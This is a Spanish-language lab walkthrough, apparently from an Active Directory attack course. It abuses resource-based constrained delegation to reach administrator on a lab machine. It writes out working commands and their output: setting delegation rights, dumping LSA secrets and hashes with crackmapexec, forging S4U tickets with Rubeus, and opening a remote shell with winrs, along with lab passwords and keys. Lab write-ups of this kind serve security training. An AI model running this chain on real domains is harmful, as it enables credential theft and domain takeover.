Learning Objective - 17
Last updated
Last updated
Para abusar de la RBCD de la forma más eficaz, sólo necesitamos dos privilegios.
Permisos de escritura sobre el servicio u objeto de destino para configurar msDSAllowedToActOnBehalfOfOtherIdentity.
Control sobre un objeto que tiene SPN configurado (como acceso admin a una maquina unida a un dominio o la habilidad de unir una maquina a un dominio - ms-DSMachineAccountQuota es 10 para todos los usuarios del dominio)
Por los laboratorios anteriores, sabes que tenemos acceso al usuario CIADMIN, asi que enumeramos sus permisos.
dcorp\ciadmin:*ContinuousIntrusion123Mediante RSAT vamos a configurar el RBCD.
PS C:\AD\Tools\ADModule-master\ActiveDirectory> $comps = 'dcorp-std723$'
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps
PS C:\AD\Tools\ADModule-master\ActiveDirectory>Ahora extraeremos el hash AES del nuestro usuario estudiante.
crackmapexec smb 172.16.100.23 -u 'student723' -p 'hT3qDFRHGzVpJtym' --lsa
SMB 172.16.100.23 445 DCORP-STD723 [*] Windows 10.0 Build 20348 x64 (name:DCORP-STD723) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.100.23 445 DCORP-STD723 [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB 172.16.100.23 445 DCORP-STD723 [+] Dumping LSA secrets
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aes256-cts-hmac-sha1-96:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aes128-cts-hmac-sha1-96:df30e9661d9fdbec4812b51673713729
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:des-cbc-md5:bf10e370e064101c
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:plain_password_hex:3c004300200059006e0020007900340038004e0057005900420031006c00440049004e00340043005e00220044003e005b0031003f00270037005f0020003a0051007700440042004a004300500059006c005f002b00600064003e002800720044007700360023007000270066002d006f0037003c0039005200710043005400790071006a007100520078005e0057002f00210040003700440024002a002c003b007600620063003e004f005400610058004700420058006d007100260030002f002f004300770044006d00600029002400290071006d005c0073004d003100580068004b0032006400730036002000
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aad3b435b51404eeaad3b435b51404ee:b7e5761232035582a44230df3247d401:::
SMB 172.16.100.23 445 DCORP-STD723 dpapi_machinekey:0xababb32297aa7249ddae9c0653a6a1017e71b9a4
dpapi_userkey:0xf06a4a31213cab5931ec2c976ab3de2ec6297136
SMB 172.16.100.23 445 DCORP-STD723 NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB 172.16.100.23 445 DCORP-STD723 [+] Dumped 12 LSA secrets to /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.secrets and /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.cached
Luego, ejecutamos el rubeus.
PS C:\AD\Tools> .\Rubeus.exe s4u /user:dcorp-std723$ /aes256:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: S4U
[*] Using aes256_cts_hmac_sha1 hash: 8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-std723$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
LmxvY2Fs
[*] Action: S4U
[*] Building S4U2self request for: 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):
doIGVzCCBlOgAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohowGKADAgEBoREwDxsNZGNvcnAtc3RkNzIzJKOCBPIwggTuoAMCARKhAwIBAqKCBOAE
ggTcDiZfokRZXbTLQ0fLEDWhAlUDzf03O1ajhZ+rfUueWrQENaGiTBfWw+ahfflX/QKr94QR/djouKeP
vhODBGL5R33bbqjy88wmt1P7p3kzrxeuFy006IE5X2ESWzu8witIC8j0pufBEukR5IP6O5HExsqAyR+J
NVyNpIOJ2n4fVpP/+ugpZ4Hy4VHCr4RtTBlj3Xx4gDo+j6+FLN1Xxs8nwHmgqdrZETIkmMr9FqxuqgR7
2GcUi+4IYIL3ORATYcrE/JH8vN5nVqbkfr5rx0Ec4yZ0fVkwIb14qeDKQgtZQvhDEIPA7r0jZ139/X5U
g4sJd6TihD83u6jJaKKsQ8p1lj5qjHv1VIIMomXqCMaq4Xdp3Qhm4iUfTUCmjrUSpLob/csPt+jhZVn5
dbvGvfu5A5uObsC8U+n12RLXoXS3+aIXAuvK+W4gMXBRxe0Xhk/yd+ijHshWaeoTyTL1XWBYc3fIvtDL
RpsQfw95B/njfhfU3GIRQIkhdJokStSyuHjJ1lwy+uJNEUJMYiqI/UwdyXLVbdl8v83hvG9fZqa0+bvM
EDtWgZkQ6fZokHOSZR99N2ORUr5JspVyNd4n8LKcuFBpAy3Wn6gfkuvdxp4/1MtAcCg4Hg+0C6YKxMSY
q3eGJX9d5KFKlmAaRz1JGbYMGFn/XLuMljw3Tbs/qj0V5WS6MJRUzVg24np3gaSo/Zaz70m3mgmxlKwg
ap+CJdjdwmlNHpo5UcXDQ1brTqYXVh5u198cHTJ3nsdfDqh6R/KUNweeT/4+sMSTPB2ElJVxbhbJ0iRL
d8gRIkl6vTrVTUNpZNt+xJ7ny85hrWV+kBUihUcRUE9UCPoy4YpFkiF6mBDVdbEjqilNsR2fxfxYHyKN
p/79XlwSMAaTiTP0qwlvUQBNWnb7qiMg66fBahUDgNTNiv4ze+lPb5z5CjcSAXfxWo/gCYdUegmrprUL
qLZ0Ep4K8kpGPfW61xKXLKauAA4aOxd5LiL43rJfFsK/TbxAgEKCpWIozctsH7lf3OCOYbjmxcA7JpkC
yQ+ck+5K84m9WCEywCK/+Ls6BcFSCIXFIvq6IOeC9Ut/nUSP/etxMK9sImzCr/XlzrZ+NzrfoHySCbDe
1ieXMv8FGjeGn+mWna21sgVMnuMPnPJUUm+IlQebn4cwyUDUnyYyet91AUBP+yYDK5pNz7/oAfpdzii0
FfYJuIYI6+lXlwlX5flPdpGUzWXQWw+aQNkhI0WVSAts0BLF8UQX6rtVmXgDS/NGVnSQAqkl7fiXgsnF
PtrPsBw7uqNY5ew0fJhFYIRHoGSSD3oLurpUK/v8vmkMtVTyDYu+tjjrr1IdOYFgD3yVGs3YWT18jOtM
tawK9fuK6EtBDsUlPcW9MUKiZm7/qKWd6oG6JaUHwbDP+SGmOFbOZQ8U9GMan/cuT6SWNjo4u+bdZ8e5
eRdthk8SQx36www1qeeS+cQshqQCKoGHH1SfxK/wX71ZnCH7P/3AefMb3tUZ56AF0XRfp2Fw6s1aQIp/
yT+Mnc0KDaUOelpzkvFP/zdkRAIdCo2peUEGPUVeag2ZdHx4g4i9INk+o9xWvCj3YvhkfAXhR96IlzbY
XcPSltaqSDp51sbNIdVVgSojEB5lAUgj4e7iyVaUQ27/w3yjexd6DWIEryIQotKjggEAMIH9oAMCAQCi
gfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgHf7JuTYsspE7T5GSSRrC/6QbI546r5+nL4sA
uW6vxgWhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJh
dG9yowcDBQBAoQAApREYDzIwMjQwMzA0MDA0MDE1WqYRGA8yMDI0MDMwNDEwNDAxNVqnERgPMjAyNDAz
MTEwMDQwMTVaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqRowGKADAgEBoREwDxsNZGNvcnAt
c3RkNzIzJA==
[*] Impersonating user 'administrator' to target SPN 'http/dcorp-mgmt'
[*] Building S4U2proxy request for service: 'http/dcorp-mgmt'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt':
doIHBDCCBwCgAwIBBaEDAgEWooIF/DCCBfhhggX0MIIF8KADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoh0wG6ADAgECoRQwEhsEaHR0cBsKZGNvcnAtbWdtdKOCBaowggWmoAMCARKhAwIBAaKC
BZgEggWUvzMFfAGSEAcM5Hd2pSaGJ5bzAP3/0u9GZZNLYqrM0Z4eVjJynrbxc8rvgFc8fWY+Fy6PsqQJ
vDUEFqoO6x1zi+F9+o4rdoEvRJ3GpiODLzqpgRRbuvTJVS+naj3Y642AHS2ZF5cpSm3PFXdhqZdVZHvE
ZtA/PVUthZxhH2ni570Ba7s5EvaIXWT8vLeFXI0p0Qkcd5rZQkJDHl84BCuMHgv7mkZNozjdUcudzZ7T
CzjF2Aa1dtGbm7CzVYHvJUHl0SW0fDj6pZM5nT7RsjKbuUy13UY7ZME59D22XIkKUwCY+Jwif+AUuP6m
rSzv0w9bGaMqsjtvo+cpZ3T4UK52ZvSvQcJd4+vT2BUW75aeW9MDcqsVdYlJRflu+O3KxSNnvLYeH5U7
QA1GsW0KbBYbbA3rVQX1T22SNK7HjlsXjv8CUW2SjfbNy2Qyrg62HMedc2OMyagLWnHI80o3V/hmxRPF
n28nqyohv/u/SCcouEU842jQPMky0W+O/1LZ1D/nIPfGKF+kw6Hmn824es066bn/M7U9uxYwJr1VbsgW
hVTr1Ofv4092g64TT/i/m2H/rqDmZA1bJKqDRleBVcCbQT1+auR8jc8xMexRv78DpLsIveAH3rYKxwSq
Ki5XY/WrJpKSDBi0AAhQ36nD5j+MOnlKqRzbX+tQ/F8d/TXuQgSv+/R4Tvb4P7IUYsNsFUcX//fpOE0q
StofwYWMXKvbmWLcF8xIUbzhlKML80FVFfWviTAdxKBjeo4vonIHu4/ARNrC8BZHK/l2KlzvRFpd1KhL
XcTcSYOQISRWBcQvmryV+vAOIPVMk9j7KUPwsR0fjSEoC6elDYh61d7qPWoRCrzqSjmVGkIp4vp5SrFm
X0l6BFuF61LTjWOBJPOcYYNmO/dekJcxCjHsPq3AY5uYg4e0jNtSzgWOX/msCfu6o92tB+PRKGCIkt4Z
u4FIvbGlMlEifB4HSDJrYcj/0M9qj9+OZ6EUSbkyzJRxUqoXBWMRuOwCmSU1ADgNybSb/OLiVLsoYnWg
ueEsQx7sa+aLNXLljodsrSzIhL8gWa1MrC/QM/jLPuuwwPdzJ/KTiiHTy8k+zWdKSdmHa3lZdcu8g01R
Mc0WR/1cvNNKDzYyBkQyS7tIvGb64uOO8bydwBm5Pn8ZWoWEAptGWijHQnl63IGm2mOebOJ3mac2Qoxd
gi7SybmtTjbHt/vlW/mg4YrFVJ1r8Gj2mcJL6JokZk3OF/B94Xv2Bgj/TgQqdI7WGnXURWSCu6th8cHB
hdMPJTZMhd+4cRl8WyhBSmH9qiT/86zlgxkF6Rfa6ejccgwRCK40f11wJOqB0Q0ZvTCmj4eS2HbVIGBu
3WjvsF/FcgENSXCLJ1JOk8EPQDLnst60MzoP/eNTVcAUnzeEdCamte+1/2BbcO3BFonX0owc08xjJz+g
y17qNpWkvT95c5Wt1LXsSOr5D0yJ5VGwZxXKx7JbwHwgGgelEjWFR11WH/ni2wN77DK4XK9yCIySHJUa
JO1C9TPIz2Vu+LVREjpKwDZDfABzceaOV4eAKKHrc+wzx3CSFc29Uf18gmW5vqNHcDh6wk7sxw1Mcj1B
/A5Lks7wIwKZbVHzrf6ILiMlPUhCOI1nHKjx3eAL0Qsy7jTJbSrPkwUPaA8t8LgE6XOpQ0jhRGOCJOc6
DMBeS+56PVa6fCcIBMdiRmNiqW3Q4aQJ+krPTXi0vat+YCV7OnyH3v6NuqKuy7kFPCWqMUBqS1lFUhH8
CVHlV5c1r6D3qWwRcCCxYfDK5b9vuQnJRh27INOOdYAduwLxJ+H9j94UHAiRnMQMteOF4DLQ+SgPvYir
BRCKrcIS6P6Da/J/Xfn0v8QGm0eYwxvrwVRXSxjUWDSwwvm3Gb6AKGSiOb+Elurzj1+/AwGdo4HzMIHw
oAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagGzAZoAMCARGhEgQQ2hbTLg9AUyNNoalpYtGNf6EcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAECh
AAClERgPMjAyNDAzMDQwMDQwMTVaphEYDzIwMjQwMzA0MTA0MDE1WqcRGA8yMDI0MDMxMTAwNDAxNVqo
HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypHTAboAMCAQKhFDASGwRodHRwGwpkY29ycC1tZ210
[+] Ticket successfully imported!
PS C:\AD\Tools> klist
Current LogonId is 0:0xe922452
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: http/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 3/3/2024 16:40:15 (local)
End Time: 3/4/2024 2:40:15 (local)
Renew Time: 3/10/2024 16:40:15 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:Luego de esto, con el ticket cargado, iniciamos una cmd remota con winrs.
PS C:\AD\Tools> winrs -r:dcorp-mgmt cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator.dcorp>hostname
hostname
dcorp-mgmt
C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator
Explotar RBCD te permite obtener RCE en un objeto al cual solo contabas con permisos GenericWrite.